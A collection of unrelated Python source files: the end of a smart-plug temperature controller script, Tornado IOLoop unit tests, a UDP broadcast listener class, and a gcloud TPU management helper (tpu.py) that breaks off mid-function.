"%c" now = time.strftime(timeFormatStr) timestamp = "{}".format(now) nowTimeOfDay = int(timestamp) if tempCtrlSettings.TIME_OF_DAY_TO_START > tempCtrlSettings.TIME_OF_DAY_TO_STOP: # Start in 1 day and ends in the next day if nowTimeOfDay >= tempCtrlSettings.TIME_OF_DAY_TO_START or nowTimeOfDay < tempCtrlSettings.TIME_OF_DAY_TO_STOP: retVal = True else: # Start and end in same day if nowTimeOfDay >= tempCtrlSettings.TIME_OF_DAY_TO_START and nowTimeOfDay < tempCtrlSettings.TIME_OF_DAY_TO_STOP: retVal = True except: logMsg("Failed to determine time of day.") return retVal def getTimeUntilSwitchCanBeSet(ignoreTimeSinceLastSuccess = False): global lastFailedSwitchChangeTime global lastSuccessfulSwitchChangeTime currentTime = getCurrentTime() timeSinceLastSwitchChangeFailure = currentTime - lastFailedSwitchChangeTime timeSinceLastSwitchChangeSuccess = currentTime - lastSuccessfulSwitchChangeTime if ignoreTimeSinceLastSuccess: timeSinceLastSwitchChangeSuccess = tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE # Set such that different below will be zero. timeUntilSwitchCanBeSet = max(tempCtrlSettings.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE - timeSinceLastSwitchChangeFailure, \ tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE - timeSinceLastSwitchChangeSuccess) return timeUntilSwitchCanBeSet if timeUntilSwitchCanBeSet > 0 else 0 def resetTimeSwitchCanBeSet(switchSetResult): global lastFailedSwitchChangeTime global lastSuccessfulSwitchChangeTime if switchSetResult == CHANGE_SWITCH_RESULT_FAILED: lastFailedSwitchChangeTime = getCurrentTime() lastSuccessfulSwitchChangeTime = WAY_IN_THE_PAST elif switchSetResult == CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED or switchSetResult == CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED: lastSuccessfulSwitchChangeTime = getCurrentTime() lastFailedSwitchChangeTime = WAY_IN_THE_PAST ################################################################################ # Program Start ################################################################################ # Initialization logMsg("##### Starting Temperature Control Switch #####") goodSettings = loadSettingsFromJson() printTempCtrlSettings(currentTempCtrlSettings) setupIcpServer(IPC_SOCKET_PATH) if goodSettings == False: logMsg("##### Invalid Starting Settings - Waiting for valid settings.") while goodSettings == False: time.sleep(10) goodSettings = loadSettingsFromJson() if goodSettings: logMsg("##### Valid Start Settings Found #####") temperatureSensorLib.temperatureSensor_init() temperatureSensorLib.temperatureSensor_getFahrenheit() # It seems like the first temperature can be old, clear out the old value. nextTemperatureCheckTime = getCurrentTime() setSmartPlugState = setSmartPlugState_withoutCheck # Start Forever Loop while 1: settingsMutex.acquire() tempCtrlSettings = copy.copy(currentTempCtrlSettings) # Copy the settings off for use during this loop through the while 1 settingsMutex.release() temperature = getTemperature(tempCtrlSettings) if temperature != None: extraLog = "" try: if isItTimeOfDayToControlSwitch(tempCtrlSettings) and tempCtrlSettings.SWITCH_HEAT_COOL != 0: # Check if it is ok to modify the switch state (based on the current time). timeUntilSwitchCanBeSet = getTimeUntilSwitchCanBeSet() if timeUntilSwitchCanBeSet <= 0: # Switch can be set. switchChange = determineIfSwitchStateNeedsToBeSet(temperature, tempCtrlSettings) if switchChange == SWITCH_STATE_ON or switchChange == SWITCH_STATE_OFF: result = setSmartPlugState(switchChange, tempCtrlSettings) resetTimeSwitchCanBeSet(result) extraLog = result else: extraLog = switchChange else: extraLog = "Can't set switch for {:3d} seconds".format(int(timeUntilSwitchCanBeSet)) checkForSwitchChangeDuringNonSwitchTime = True else: if checkForSwitchChangeDuringNonSwitchTime or newParametersForMainLoop: newParametersForMainLoop = False extraLog = "Leaving time to control switch - " if tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP != None: if getTimeUntilSwitchCanBeSet(True) <= 0: # Check if we can switch. Since this is a one off time change, ignore the time of the last successful temperature based switch. newSwitchState = SWITCH_STATE_ON if tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP else SWITCH_STATE_OFF result = setSmartPlugState(newSwitchState, tempCtrlSettings) resetTimeSwitchCanBeSet(result) if result != CHANGE_SWITCH_RESULT_FAILED: checkForSwitchChangeDuringNonSwitchTime = False extraLog += ("Succeeded in setting switch state to: " + newSwitchState) else: extraLog += ("Failed to set switch state to: " + newSwitchState) else: extraLog += "Waiting to be able to change switch state." else: checkForSwitchChangeDuringNonSwitchTime = False extraLog += "No change of switch specified." else: extraLog = "Not controlling switch at this time." logMsg("Temperature = {: 3.1f} | ".format(temperature) + extraLog, True) # Log temperature and switch state. lastTemperatureLogTime = updateTemperatureLogFile(temperature, currentSwitchState, lastTemperatureLogTime) except: logMsg("Failed somewhere in the while 1 loop.") else: logMsg("Failed to read temperature!") # Use the most up-to-date settings for the while 1 sleep. settingsMutex.acquire() sleepTime = getSleepTimeUntilNextTemperatureCheckTime(currentTempCtrlSettings) settingsMutex.release() time.sleep(sleepTime)
ioloop_test.py
#!/usr/bin/env python from __future__ import absolute_import, division, print_function, with_statement import contextlib import datetime import functools import socket import sys import threading import time from tornado import gen from tornado.ioloop import IOLoop, TimeoutError, PollIOLoop, PeriodicCallback from tornado.log import app_log from tornado.platform.select import _Select from tornado.stack_context import ExceptionStackContext, StackContext, wrap, NullContext from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog from tornado.test.util import unittest, skipIfNonUnix, skipOnTravis, skipBefore35, exec_test try: from concurrent import futures except ImportError: futures = None class FakeTimeSelect(_Select): def __init__(self): self._time = 1000 super(FakeTimeSelect, self).__init__() def time(self): return self._time def sleep(self, t): self._time += t def poll(self, timeout): events = super(FakeTimeSelect, self).poll(0) if events: return events self._time += timeout return [] class FakeTimeIOLoop(PollIOLoop): """IOLoop implementation with a fake and deterministic clock. The clock advances as needed to trigger timeouts immediately. For use when testing code that involves the passage of time and no external dependencies. """ def initialize(self): self.fts = FakeTimeSelect() super(FakeTimeIOLoop, self).initialize(impl=self.fts, time_func=self.fts.time) def sleep(self, t): """Simulate a blocking sleep by advancing the clock.""" self.fts.sleep(t) class TestIOLoop(AsyncTestCase): @skipOnTravis def test_add_callback_wakeup(self): # Make sure that add_callback from inside a running IOLoop # wakes up the IOLoop immediately instead of waiting for a timeout. def callback(): self.called = True self.stop() def schedule_callback(): self.called = False self.io_loop.add_callback(callback) # Store away the time so we can check if we woke up immediately self.start_time = time.time() self.io_loop.add_timeout(self.io_loop.time(), schedule_callback) self.wait() self.assertAlmostEqual(time.time(), self.start_time, places=2) self.assertTrue(self.called) @skipOnTravis def test_add_callback_wakeup_other_thread(self): def target(): # sleep a bit to let the ioloop go into its poll loop time.sleep(0.01) self.stop_time = time.time() self.io_loop.add_callback(self.stop) thread = threading.Thread(target=target) self.io_loop.add_callback(thread.start) self.wait() delta = time.time() - self.stop_time self.assertLess(delta, 0.1) thread.join() def test_add_timeout_timedelta(self): self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop) self.wait() def test_multiple_add(self): sock, port = bind_unused_port() try: self.io_loop.add_handler(sock.fileno(), lambda fd, events: None, IOLoop.READ) # Attempting to add the same handler twice fails # (with a platform-dependent exception) self.assertRaises(Exception, self.io_loop.add_handler, sock.fileno(), lambda fd, events: None, IOLoop.READ) finally: self.io_loop.remove_handler(sock.fileno()) sock.close() def test_remove_without_add(self): # remove_handler should not throw an exception if called on an fd # was never added. sock, port = bind_unused_port() try: self.io_loop.remove_handler(sock.fileno()) finally: sock.close() def test_add_callback_from_signal(self): # cheat a little bit and just run this normally, since we can't # easily simulate the races that happen with real signal handlers self.io_loop.add_callback_from_signal(self.stop) self.wait() def test_add_callback_from_signal_other_thread(self): # Very crude test, just to make sure that we cover this case. # This also happens to be the first test where we run an IOLoop in # a non-main thread. other_ioloop = IOLoop() thread = threading.Thread(target=other_ioloop.start) thread.start() other_ioloop.add_callback_from_signal(other_ioloop.stop) thread.join() other_ioloop.close() def test_add_callback_while_closing(self): # Issue #635: add_callback() should raise a clean exception # if called while another thread is closing the IOLoop. if IOLoop.configured_class().__name__.endswith('AsyncIOLoop'): raise unittest.SkipTest("AsyncIOMainLoop shutdown not thread safe") closing = threading.Event() def target(): other_ioloop.add_callback(other_ioloop.stop) other_ioloop.start() closing.set() other_ioloop.close(all_fds=True) other_ioloop = IOLoop() thread = threading.Thread(target=target) thread.start() closing.wait() for i in range(1000): try: other_ioloop.add_callback(lambda: None) except RuntimeError as e: self.assertEqual("IOLoop is closing", str(e)) break def test_handle_callback_exception(self): # IOLoop.handle_callback_exception can be overridden to catch # exceptions in callbacks. def handle_callback_exception(callback): self.assertIs(sys.exc_info()[0], ZeroDivisionError) self.stop() self.io_loop.handle_callback_exception = handle_callback_exception with NullContext(): # remove the test StackContext that would see this uncaught # exception as a test failure. self.io_loop.add_callback(lambda: 1 / 0) self.wait() @skipIfNonUnix # just because socketpair is so convenient def test_read_while_writeable(self): # Ensure that write events don't come in while we're waiting for # a read and haven't asked for writeability. (the reverse is # difficult to test for) client, server = socket.socketpair() try: def handler(fd, events): self.assertEqual(events, IOLoop.READ) self.stop() self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ) self.io_loop.add_timeout(self.io_loop.time() + 0.01, functools.partial(server.send, b'asdf')) self.wait() self.io_loop.remove_handler(client.fileno()) finally: client.close() server.close() def test_remove_timeout_after_fire(self): # It is not an error to call remove_timeout after it has run. handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop) self.wait() self.io_loop.remove_timeout(handle) def test_remove_timeout_cleanup(self): # Add and remove enough callbacks to trigger cleanup. # Not a very thorough test, but it ensures that the cleanup code # gets executed and doesn't blow up. This test is only really useful # on PollIOLoop subclasses, but it should run silently on any # implementation. for i in range(2000): timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600, lambda: None) self.io_loop.remove_timeout(timeout) # HACK: wait two IOLoop iterations for the GC to happen. self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop)) self.wait() def test_remove_timeout_from_timeout(self): calls = [False, False] # Schedule several callbacks and wait for them all to come due at once. # t2 should be cancelled by t1, even though it is already scheduled to # be run before the ioloop even looks at it. now = self.io_loop.time() def t1(): calls[0] = True self.io_loop.remove_timeout(t2_handle) self.io_loop.add_timeout(now + 0.01, t1) def t2(): calls[1] = True t2_handle = self.io_loop.add_timeout(now + 0.02, t2) self.io_loop.add_timeout(now + 0.03, self.stop) time.sleep(0.03) self.wait() self.assertEqual(calls, [True, False]) def test_timeout_with_arguments(self): # This tests that all the timeout methods pass through *args correctly. results = [] self.io_loop.add_timeout(self.io_loop.time(), results.append, 1) self.io_loop.add_timeout(datetime.timedelta(seconds=0), results.append, 2) self.io_loop.call_at(self.io_loop.time(), results.append, 3) self.io_loop.call_later(0, results.append, 4) self.io_loop.call_later(0, self.stop) self.wait() self.assertEqual(results, [1, 2, 3, 4]) def test_add_timeout_return(self): # All the timeout methods return non-None handles that can be # passed to remove_timeout. handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None) self.assertFalse(handle is None) self.io_loop.remove_timeout(handle) def test_call_at_return(self): handle = self.io_loop.call_at(self.io_loop.time(), lambda: None) self.assertFalse(handle is None) self.io_loop.remove_timeout(handle) def test_call_later_return(self): handle = self.io_loop.call_later(0, lambda: None) self.assertFalse(handle is None) self.io_loop.remove_timeout(handle) def test_close_file_object(self): """When a file object is used instead of a numeric file descriptor, the object should be closed (by IOLoop.close(all_fds=True), not just the fd. """ # Use a socket since they are supported by IOLoop on all platforms. # Unfortunately, sockets don't support the .closed attribute for # inspecting their close status, so we must use a wrapper. class SocketWrapper(object): def __init__(self, sockobj): self.sockobj = sockobj self.closed = False def fileno(self): return self.sockobj.fileno() def close(self): self.closed = True self.sockobj.close() sockobj, port = bind_unused_port() socket_wrapper = SocketWrapper(sockobj) io_loop = IOLoop() io_loop.add_handler(socket_wrapper, lambda fd, events: None, IOLoop.READ) io_loop.close(all_fds=True) self.assertTrue(socket_wrapper.closed) def test_handler_callback_file_object(self): """The handler callback receives the same fd object it passed in.""" server_sock, port = bind_unused_port() fds = [] def handle_connection(fd, events): fds.append(fd) conn, addr = server_sock.accept() conn.close() self.stop() self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ) with contextlib.closing(socket.socket()) as client_sock: client_sock.connect(('127.0.0.1', port)) self.wait() self.io_loop.remove_handler(server_sock) self.io_loop.add_handler(server_sock.fileno(), handle_connection, IOLoop.READ) with contextlib.closing(socket.socket()) as client_sock: client_sock.connect(('127.0.0.1', port)) self.wait() self.assertIs(fds[0], server_sock) self.assertEqual(fds[1], server_sock.fileno()) self.io_loop.remove_handler(server_sock.fileno()) server_sock.close() def test_mixed_fd_fileobj(self): server_sock, port = bind_unused_port() def f(fd, events): pass self.io_loop.add_handler(server_sock, f, IOLoop.READ) with self.assertRaises(Exception): # The exact error is unspecified - some implementations use # IOError, others use ValueError. self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ) self.io_loop.remove_handler(server_sock.fileno()) server_sock.close() def test_reentrant(self): """Calling start() twice should raise an error, not deadlock.""" returned_from_start = [False] got_exception = [False] def callback(): try: self.io_loop.start() returned_from_start[0] = True except Exception: got_exception[0] = True self.stop() self.io_loop.add_callback(callback) self.wait() self.assertTrue(got_exception[0]) self.assertFalse(returned_from_start[0]) def test_exception_logging(self): """Uncaught exceptions get logged by the IOLoop.""" # Use a NullContext to keep the exception from being caught by # AsyncTestCase. with NullContext(): self.io_loop.add_callback(lambda: 1 / 0) self.io_loop.add_callback(self.stop) with ExpectLog(app_log, "Exception in callback"): self.wait() def test_exception_logging_future(self): """The IOLoop examines exceptions from Futures and logs them.""" with NullContext(): @gen.coroutine def callback(): self.io_loop.add_callback(self.stop) 1 / 0 self.io_loop.add_callback(callback) with ExpectLog(app_log, "Exception in callback"): self.wait() @skipBefore35 def test_exception_logging_native_coro(self): """The IOLoop examines exceptions from awaitables and logs them.""" namespace = exec_test(globals(), locals(), """ async def callback(): self.io_loop.add_callback(self.stop) 1 / 0 """) with NullContext(): self.io_loop.add_callback(namespace["callback"]) with ExpectLog(app_log, "Exception in callback"): self.wait() def test_spawn_callback(self): # An added callback runs in the test's stack_context, so will be # re-arised in wait(). self.io_loop.add_callback(lambda: 1 / 0) with self.assertRaises(ZeroDivisionError): self.wait() # A spawned callback is run directly on the IOLoop, so it will be # logged without stopping the test. self.io_loop.spawn_callback(lambda: 1 / 0) self.io_loop.add_callback(self.stop) with ExpectLog(app_log, "Exception in callback"): self.wait() @skipIfNonUnix def test_remove_handler_from_handler(self): # Create two sockets with simultaneous read events. client, server = socket.socketpair() try: client.send(b'abc') server.send(b'abc') # After reading from one fd, remove the other from the IOLoop. chunks = [] def handle_read(fd, events): chunks.append(fd.recv(1024)) if fd is client: self.io_loop.remove_handler(server) else: self.io_loop.remove_handler(client) self.io_loop.add_handler(client, handle_read, self.io_loop.READ) self.io_loop.add_handler(server, handle_read, self.io_loop.READ) self.io_loop.call_later(0.1, self.stop) self.wait() # Only one fd was read; the other was cleanly removed. self.assertEqual(chunks, [b'abc']) finally: client.close() server.close() # Deliberately not a subclass of AsyncTestCase so the IOLoop isn't # automatically set as current. class TestIOLoopCurrent(unittest.TestCase): def setUp(self): self.io_loop = None IOLoop.clear_current() def tearDown(self): if self.io_loop is not None: self.io_loop.close() def test_default_current(self): self.io_loop = IOLoop() # The first IOLoop with default arguments is made current. self.assertIs(self.io_loop, IOLoop.current()) # A second IOLoop can be created but is not made current. io_loop2 = IOLoop() self.assertIs(self.io_loop, IOLoop.current()) io_loop2.close() def test_non_current(self): self.io_loop = IOLoop(make_current=False) # The new IOLoop is not initially made current. self.assertIsNone(IOLoop.current(instance=False)) # Starting the IOLoop makes it current, and stopping the loop # makes it non-current. This process is repeatable. for i in range(3): def f(): self.current_io_loop = IOLoop.current() self.io_loop.stop() self.io_loop.add_callback(f) self.io_loop.start() self.assertIs(self.current_io_loop, self.io_loop) # Now that the loop is stopped, it is no longer current. self.assertIsNone(IOLoop.current(instance=False)) def test_force_current(self): self.io_loop = IOLoop(make_current=True) self.assertIs(self.io_loop, IOLoop.current()) with self.assertRaises(RuntimeError): # A second make_current=True construction cannot succeed. IOLoop(make_current=True) # current() was not affected by the failed construction. self.assertIs(self.io_loop, IOLoop.current()) class TestIOLoopAddCallback(AsyncTestCase): def setUp(self): super(TestIOLoopAddCallback, self).setUp() self.active_contexts = [] def add_callback(self, callback, *args, **kwargs): self.io_loop.add_callback(callback, *args, **kwargs) @contextlib.contextmanager def context(self, name): self.active_contexts.append(name) yield self.assertEqual(self.active_contexts.pop(), name) def test_pre_wrap(self): # A pre-wrapped callback is run in the context in which it was # wrapped, not when it was added to the IOLoop. def f1(): self.assertIn('c1', self.active_contexts) self.assertNotIn('c2', self.active_contexts) self.stop() with StackContext(functools.partial(self.context, 'c1')): wrapped = wrap(f1) with StackContext(functools.partial(self.context, 'c2')): self.add_callback(wrapped) self.wait() def test_pre_wrap_with_args(self): # Same as test_pre_wrap, but the function takes arguments. # Implementation note: The function must not be wrapped in a # functools.partial until after it has been passed through # stack_context.wrap def f1(foo, bar): self.assertIn('c1', self.active_contexts) self.assertNotIn('c2', self.active_contexts) self.stop((foo, bar)) with StackContext(functools.partial(self.context, 'c1')): wrapped = wrap(f1) with StackContext(functools.partial(self.context, 'c2')): self.add_callback(wrapped, 1, bar=2) result = self.wait() self.assertEqual(result, (1, 2)) class TestIOLoopAddCallbackFromSignal(TestIOLoopAddCallback): # Repeat the add_callback tests using add_callback_from_signal def add_callback(self, callback, *args, **kwargs): self.io_loop.add_callback_from_signal(callback, *args, **kwargs) @unittest.skipIf(futures is None, "futures module not present") class TestIOLoopFutures(AsyncTestCase): def test_add_future_threads(self): with futures.ThreadPoolExecutor(1) as pool: self.io_loop.add_future(pool.submit(lambda: None), lambda future: self.stop(future)) future = self.wait() self.assertTrue(future.done()) self.assertTrue(future.result() is None) def test_add_future_stack_context(self): ready = threading.Event() def task(): # we must wait for the ioloop callback to be scheduled before # the task completes to ensure that add_future adds the callback # asynchronously (which is the scenario in which capturing # the stack_context matters) ready.wait(1) assert ready.isSet(), "timed out" raise Exception("worker") def callback(future): self.future = future raise Exception("callback") def handle_exception(typ, value, traceback): self.exception = value self.stop() return True # stack_context propagates to the ioloop callback, but the worker # task just has its exceptions caught and saved in the Future. with futures.ThreadPoolExecutor(1) as pool: with ExceptionStackContext(handle_exception): self.io_loop.add_future(pool.submit(task), callback) ready.set() self.wait() self.assertEqual(self.exception.args[0], "callback") self.assertEqual(self.future.exception().args[0], "worker") class TestIOLoopRunSync(unittest.TestCase): def setUp(self): self.io_loop = IOLoop() def tearDown(self): self.io_loop.close() def test_sync_result(self): with self.assertRaises(gen.BadYieldError): self.io_loop.run_sync(lambda: 42) def test_sync_exception(self): with self.assertRaises(ZeroDivisionError): self.io_loop.run_sync(lambda: 1 / 0) def test_async_result(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_callback) raise gen.Return(42) self.assertEqual(self.io_loop.run_sync(f), 42) def test_async_exception(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_callback) 1 / 0 with self.assertRaises(ZeroDivisionError): self.io_loop.run_sync(f) def test_current(self): def f(): self.assertIs(IOLoop.current(), self.io_loop) self.io_loop.run_sync(f) def test_timeout(self): @gen.coroutine def f(): yield gen.Task(self.io_loop.add_timeout, self.io_loop.time() + 1) self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01) @skipBefore35 def test_native_coroutine(self): namespace = exec_test(globals(), locals(), """ async def f(): await gen.Task(self.io_loop.add_callback) """) self.io_loop.run_sync(namespace['f']) class TestPeriodicCallback(unittest.TestCase): def setUp(self): self.io_loop = FakeTimeIOLoop() self.io_loop.make_current() def tearDown(self): self.io_loop.close() def test_basic(self): calls = [] def cb(): calls.append(self.io_loop.time()) pc = PeriodicCallback(cb, 10000) pc.start() self.io_loop.call_later(50, self.io_loop.stop) self.io_loop.start() self.assertEqual(calls, [1010, 1020, 1030, 1040, 1050]) def test_overrun(self): sleep_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0] expected = [ 1010, 1020, 1030, # first 3 calls on schedule 1050, 1070, # next 2 delayed one cycle 1100, 1130, # next 2 delayed 2 cycles 1170, 1210, # next 2 delayed 3 cycles 1220, 1230, # then back on schedule. ] calls = [] def cb(): calls.append(self.io_loop.time()) if not sleep_durations: self.io_loop.stop() return self.io_loop.sleep(sleep_durations.pop(0)) pc = PeriodicCallback(cb, 10000) pc.start() self.io_loop.start() self.assertEqual(calls, expected) if __name__ == "__main__": unittest.main()
BroadcastListener.py
import socket import threading import time class BroadcastListener: def __init__(self, port): self._port = port def StartListenerAsync(self): self._haltFlag = False self._listenerThread = threading.Thread(target=self._startListener) self._listenerThread.start() def StopListener(self): self._haltFlag = True socketAddress = ('255.255.255.255', self._port) broadcastSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) broadcastSocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) broadcastSocket.sendto('end', socketAddress) def _startListener(self): listenerSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) listenerSocket.bind(('', self._port)) while not self._haltFlag: receivedData = listenerSocket.recvfrom(1024) sender = receivedData[1] ipAddress = sender[0] port = sender[1] message = receivedData[0] print ipAddress + ':', message
tpu.py
from six.moves import shlex_quote as shellquote from subprocess import check_output import json import re import ring import sys import os import logging import threading import contextlib from pprint import pprint as pp logger = logging.getLogger('tpudiepie') # create console handler and set level to debug ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # create formatter formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s', datefmt='%m-%d-%Y %I:%M:%S%p %Z') ch.setFormatter(formatter) logger.addHandler(ch) def ero(x): logger.info('%s', x) return x def build_opt(k, v): k = k.replace('_', '-').replace('--', '_') if v is True: return '--' + k if v is False: return '--no-' + k return '--{} {}'.format(k, shellquote(v)) def build_commandline(cmd, *args, **kws): return ' '.join([cmd] + [shellquote(x) for x in args] + [build_opt(k, v) for k, v in kws.items() if v is not None]) def system(cmd, *args, **kws): command = build_commandline(cmd, *args, **kws) os.system(command) def run(cmd, *args, **kws): command = build_commandline(cmd, *args, **kws) out = check_output(ero(command), shell=True) return out def parse_tpu_project(tpu): fqn = tpu if isinstance(tpu, str) else tpu['name'] return fqn.split('/')[-5] def parse_tpu_zone(tpu): fqn = tpu if isinstance(tpu, str) else tpu['name'] return fqn.split('/')[-3] def parse_tpu_id(tpu): fqn = tpu if isinstance(tpu, str) else tpu['name'] return fqn.split('/')[-1] def parse_tpu_index(tpu): fqn = tpu if isinstance(tpu, str) else tpu['name'] idx = re.findall(r'([0-9]+)$', fqn) if len(idx) <= 0: idx = -1 else: idx = int(idx[0]) return idx def parse_tpu_network(tpu): net = tpu if isinstance(tpu, str) else tpu['network'] return net.split('/')[-1] @ring.lru(expire=3600) # cache tpu zones for an hour def get_tpu_zones(): out = run("gcloud compute tpus locations list", format="json") zones = json.loads(out) return [zone['locationId'] for zone in zones] class nullcontext(contextlib.AbstractContextManager): """Context manager that does no additional processing. Used as a stand-in for a normal context manager, when a particular block of code is only sometimes used with a normal context manager: cm = optional_cm if condition else nullcontext() with cm: # Perform operation, using optional_cm if condition is True """ def __init__(self, enter_result=None): self.enter_result = enter_result def __enter__(self): return self.enter_result def __exit__(self, *excinfo): pass def click_context(): try: import click ctx = click.get_current_context(silent=True) except: ctx = None if ctx is None: ctx = nullcontext() return ctx @ring.lru(expire=15) # cache tpu info for 15 seconds def fetch_tpus(zone=None): if zone is None: zones = get_tpu_zones() if isinstance(zone, str): zones = zone.split(',') tpus = [] ctx = click_context() def fetch(zone): with ctx: more = list_tpus(zone) tpus.extend(more) threads = [threading.Thread(target=fetch, args=(zone,), daemon=True) for zone in zones] for thread in threads: thread.start() for thread in threads: thread.join() return tpus def list_tpus(zone): out = run("gcloud compute tpus list", format="json", zone=zone) tpus = json.loads(out) return list(sorted(tpus, key=parse_tpu_index)) def get_tpus(zone=None): tpus = fetch_tpus(zone=zone) if zone is None: return tpus else: return [tpu for tpu in tpus if '/{}/'.format(zone) in tpu['name']] def get_tpu(tpu, zone=None, silent=False): if isinstance(tpu, dict): tpu = parse_tpu_id(tpu) if isinstance(tpu, str) and re.match('^[0-9]+$', tpu): tpu = int(tpu) if isinstance(tpu, int): which = 'index' tpus = [x for x in get_tpus(zone=zone) if parse_tpu_index(x) == tpu] else: which = 'id' tpus = [x for x in get_tpus(zone=zone) if parse_tpu_id(x) == tpu] if len(tpus) > 1: raise ValueError("Multiple TPUs matched {} {!r}. Try specifying --zone".format(which, tpu)) if len(tpus) <= 0: if silent: return None raise ValueError("No TPUs matched {} {!r}".format(which, tpu)) return tpus[0] from string import Formatter class NamespaceFormatter(Formatter): def __init__(self, namespace={}): Formatter.__init__(self) self.namespace = namespace def get_value(self, key, args, kwds): if isinstance(key, str): try: # Check explicitly passed arguments first return kwds[key] except KeyError: return self.namespace[key] else: return Formatter.get_value(key, args, kwds) from collections import defaultdict @ring.lru(expire=1) # seconds def format_widths(): headers = format_headers() tpus = get_tpus() r = defaultdict(int) for tpu in tpus: args = _format_args(tpu) for k, v in args.items(): s = '{}'.format(v) r[k+'_w'] = max(r[k+'_w'], len(s) + 1, len(headers[k]) + 1) return r def _normalize_tpu_isodate(iso): r = re.findall('(.*[.][0-9]{6})[0-9]*Z', iso) if len(r) > 0: return r[0] + 'Z' raise ValueError("Could not parse TPU date {!r}".format(iso)) import moment import datetime import time def get_timestamp(timestamp=None, utc=True): if timestamp is None: timestamp = time.time() # https://stackoverflow.com/a/52606421/9919772 #dt = datetime.datetime.fromtimestamp(timestamp).astimezone() dt = moment.unix(timestamp, utc=utc) dt = dt.timezone(current_tzname()) return dt.strftime("%m-%d-%Y %I:%M:%S%p %Z") def current_timezone(): if time.daylight: return datetime.timezone(datetime.timedelta(seconds=-time.altzone),time.tzname[1]) else: return datetime.timezone(datetime.timedelta(seconds=-time.timezone),time.tzname[0]) def current_tzname(): return current_timezone().tzname(None) def since(iso): dt = moment.utcnow() - moment.utc(_normalize_tpu_isodate(iso), "%Y-%m-%dT%H:%M:%S.%fZ") return dt.total_seconds() def minutes_since(iso): return since(iso) / 60 def hours_since(iso): return since(iso) / 3600 def days_since(iso): return since(iso) / 86400 def nice_since(iso): t = int(since(iso)) s = t % 60 m = (t // 60) % 60 h = (t // 3600) % 24 d = (t // 86400) r = [] out = False if d > 0 or out: out = True r += ['{:02d}d'.format(d)] else: r += [' '] if h > 0 or out: out = True r += ['{:02d}h'.format(h)] else: r += [' '] if m > 0 or out: out = True r += ['{:02d}m'.format(m)] else: r += [' '] # if s > 0 or out: # out = True # r += ['{:02d}s'.format(s)] return ''.join(r) def format_headers(): return { 'kind': 'header', 'project': 'PROJECT', 'zone': 'ZONE', 'id': 'ID', 'fqn': 'FQN', 'ip': 'IP', 'port': 'PORT', 'master': 'MASTER', 'range': 'RANGE', 'type': 'TYPE', 'created': 'CREATED', 'age': 'AGE', 'preemptible': 'PREEMPTIBLE?', 'status': 'STATUS', 'health': 'HEALTH', 'index': 'INDEX', 'version': 'VERSION', 'network': 'NETWORK', } def _format_args(tpu): return { 'kind': 'tpu', 'project': parse_tpu_project(tpu), 'zone': parse_tpu_zone(tpu), 'id': parse_tpu_id(tpu), 'fqn': tpu['name'], 'ip': parse_tpu_ip(tpu), 'port': tpu['port'], 'master': parse_tpu_master(tpu), 'range': parse_tpu_range(tpu), 'type': parse_tpu_type(tpu), 'created': tpu['createTime'], 'age': nice_since(tpu['createTime']), 'preemptible': 'yes' if parse_tpu_preemptible(tpu) else 'no', 'status': tpu['state'], 'health': tpu.get('health', 'UNKNOWN'), 'index': parse_tpu_index(tpu), 'version': parse_tpu_version(tpu), 'network': parse_tpu_network(tpu), } def parse_tpu_preemptible(tpu): return tpu.get('schedulingConfig', {'preemptible': False}).get('preemptible', False) def parse_tpu_ip(tpu): return tpu.get('ipAddress', '') def parse_tpu_master(tpu): return '{}:{}'.format(tpu.get('ipAddress',''), tpu.get('port', 8470)) def parse_tpu_range(tpu): return tpu['cidrBlock'] def parse_tpu_version(tpu): return tpu['tensorflowVersion'] def parse_tpu_type(tpu): return tpu['acceleratorType'] def parse_tpu_description(tpu): return tpu.get('description', None) def format_args(tpu): r = _format_args(tpu) r.update(format_widths()) return r def get_default_format_specs(thin=False): specs = [ "{zone:{zone_w}}", "{index:<{index_w}}", "{type:{type_w}}", "{age:{age_w}}", "{id:{id_w}}", "{status:{status_w}}", "{health:{health_w}}", "{version:{version_w}}", "{network:{network_w}}", "{master:{master_w}}", "{range:{range_w}}", "{preemptible!s:{preemptible_w}}", ] if thin: return ['{' + re.findall('{([^:]+)[:]', x)[0] + '}' for x in specs] else: return specs def get_default_format_spec(thin=False): return ' '.join(get_default_format_specs(thin=thin)) def format(tpu, spec=None, formatter=NamespaceFormatter): if tpu.get('kind', 'tpu') == 'tpu': args = format_args(tpu) else: args = {} args.update(tpu) args.update(format_widths()) fmt = formatter(args) if spec is None: spec = get_default_format_spec(thin=len(format_widths()) == 0) return fmt.format(spec) def create_tpu_command(tpu, zone=None, version=None, description=None, preemptible=None): if zone is None: zone = parse_tpu_zone(tpu) if version is None: version = parse_tpu_version(tpu) if description is None: description = parse_tpu_description(tpu) if preemptible is None: preemptible = True if parse_tpu_preemptible(tpu) else None return build_commandline("gcloud compute tpus create", parse_tpu_id(tpu), zone=zone, network=parse_tpu_network(tpu), range=parse_tpu_range(tpu), version=version, accelerator_type=parse_tpu_type(tpu), preemptible=preemptible, description=description, ) def delete_tpu_command(tpu, zone=None): if zone is None: zone = parse_tpu_zone(tpu) return build_commandline("gcloud compute tpus 